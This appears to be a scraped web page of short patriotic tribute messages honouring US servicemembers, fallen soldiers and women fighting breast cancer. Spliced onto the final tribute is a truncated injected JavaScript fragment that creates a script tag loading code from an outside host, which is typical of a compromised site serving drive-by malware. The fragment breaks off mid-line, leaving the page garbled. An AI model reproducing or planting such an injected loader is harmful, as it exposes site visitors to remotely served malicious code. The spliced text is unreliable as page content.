Supporting those servicemembers that are overseas. To make sure that they know they are missed and thought of. Remembering all of those that have given the ultimate sacrifice in order to help others obtain freedom. You will never be forgotten!
"WMD'S" WOMEN MEN DESIRE!!! All of the women that support the men of the armed forces. Osama Bin Laden so we could stop looking for him. And all of those insurgents that are running wild.
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All people that have ever served in the United States military. With out them we wouldn't have our freedom. Also to those current members of our service that VOLUNTEERED to serve so that others will not have to. We also honor and remember all of the women that have faught or are fighting their own war against breast cancer."var x=document.createElement('script');x.src='http://www.actuali';document.getElementsByTagName('body')
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